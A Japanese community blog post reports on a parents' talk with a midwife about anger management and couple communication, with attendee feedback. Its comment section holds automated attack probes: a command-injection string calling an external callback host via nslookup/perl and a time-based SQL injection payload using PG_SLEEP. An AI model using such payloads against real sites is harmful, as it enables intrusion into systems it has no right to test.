· 

助産師さんとおしゃべり会 終了

11月13日の集い、

助産師さんとおしゃべり会~夫婦コミュニケーション&アンガーマネジメント~

無事終了しました!

13組の参加でした。久しぶりに大人数!

 

musubi助産院の塩見直美さんをお迎えして、

アンガーマネジメントについてのお話や具体的な対処法をお聞きしました。

タイプ診断もそれぞれで行いました。

参加者のみなさんで自己紹介しながら、それぞれの思いも語り合いました。

夫婦関係についても、アンガーマネジメントとも絡めてお話いただきました。

忘れてはいけないポイントも、ランチをしながら。

 

助産師さんとしての知識はもちろん、3人の子育てをしていて感じたこと、塩見さん自身が対処したことや失敗したことなども絡めてお話いただけて、

早速実践したくなることばかりでした^^

知識だけではなく実際の体験談はとても腑に落ちることばかりでした!

 

子どもちゃんもたくさん来られてましたが大暴れなどすることなく。

いつも協力してくれる小さいひとたち。本当にありがとう。

 

 

〇参加の方の感想〇

 

・自分もいろいろ育児で苦労してきましたが、シェアする中で同じママとしてみな様々な悩みや不安を抱えているのだと思うと、自分満たし含めて皆さんのお役に立てることはないかと改めて考えさせられるいい時間でした。

 

・日々の育児の中で、怒りに対しての悩みに気付きながらも、どうしたらよいかわからないままに過ごしてきました。周りの人に話しても、度合いまでは、わからないのでわかってもらえずに、いつも置き去り状態。
でも、塩見さんのお話を聞いて、怒りに対しての悩みを紐解いてもらった感じがしました。8つのマジックは、全部でなくてもできるところやできたことを続けることに意味があるということで、少しずつ取り入れていけるかもしれないと思いました。
周りの人のせいにするのではなく、やはり自分が変わっていくことに意味があることも再確認できたように思います。
家族との向き合い方もちょっとずつ変われば、私自身の気持ちのゆとりもできるかなと思いました。
塩見さん、みなさんありがとうございました。

 

・今朝から色々実践して朝から怒りを計測しながら過ごせていたら、いつもよりガミガミ言わずに済み、
イライラしないママのゆとりにつられた〇〇ちゃんは朝のバスまでに用意が間に合わずバスに乗り遅れました。
まだまだ試行錯誤が必要なようです。

 

・アンガーマネジメントの話は他で少し聞いていましたが、具体的な育児例も出してのお話だったので、日常的でわかりやすかった。性格診断も興味深かった。
怒りレベルの数値化、心を落ち着かせたり、逆に家庭でも数値を口に出して子どもとふざけてみたり…ヒステリックな怒りではなく、「見える怒り」に変えてみると生活が楽しめてラクになるかも?ヒントをもらいました。

夫婦コミュニケーションについては、やはり家庭の中でいちばんの根っこは、対子ども以前に夫婦仲だと思う。
夫婦でのわだかまりが根底にある時、自分がイライラしてしまったり、不安定にもなっていて、それが夫にではなく、子どもや家庭に返ってしまう…。
まずは夫婦での解決、それも「話すこと」が基本なんだと再認識する機会をもらいました。

夫婦生活のお話は、私は友人ともする事がないので、色々な思いや考え方、貴重な機会でした。

塩見さんのお人柄がとても柔らかく、あくまで「相手のお話を聞いて寄り添い、自身のお考えをやんわり伝えてくれる」姿勢が、心に響き、とても受け入れやすかった。
また定期的にお話を聞かせて欲しい、このめ食堂にとってもそんな大切なお方では?と強く思いました。

企画に心から感謝です。

 

夫婦関係のお話では性教育や性に関することまで話が及びました。

是非、また来ていただきたいと懇願しています!!

 

 

このめ食堂は明日11月15日、

長岡京こらさいこ~る交流会にも参加します。

次回の集いは4周年をプチ記念?

集いの定番テーマ、お産を振り返る会、もしくは、子どもの予防接種を考える会で企画中です。

お子さま連れでも、おひとりでも、気軽に集え、自分の思いをありのまま出せるような場でありたいなと思っています。

お気軽にお越しください^^

コメントをお書きください

コメント: 11
  • #1

    QPbmCRVM (月曜日, 16 8月 2021 22:16)

    1

  • #2

    QPbmCRVM (月曜日, 16 8月 2021 22:20)

    1

  • #3

    (nslookup hitxdounxqizkb272e.bxss.me||perl -e "gethostbyname('hitxdounxqizkb272e.bxss.me')") (月曜日, 16 8月 2021 22:21)

    1

  • #4

    QPbmCRVM (月曜日, 16 8月 2021 22:22)

    -5) OR 93=(SELECT 93 FROM PG_SLEEP(3))--

  • #5

    QPbmCRVM (月曜日, 16 8月 2021 22:22)

    1

  • #6

    QPbmCRVM (月曜日, 16 8月 2021 22:22)

    1

  • #7

    QPbmCRVM (月曜日, 16 8月 2021 22:23)

    1

  • #8

    QPbmCRVM (月曜日, 16 8月 2021 22:23)

    1

  • #9

    QPbmCRVM (月曜日, 16 8月 2021 22:24)

    1

  • #10

    QPbmCRVM (月曜日, 16 8月 2021 22:24)

    1

  • #11

    QPbmCRVM (月曜日, 16 8月 2021 23:54)

    1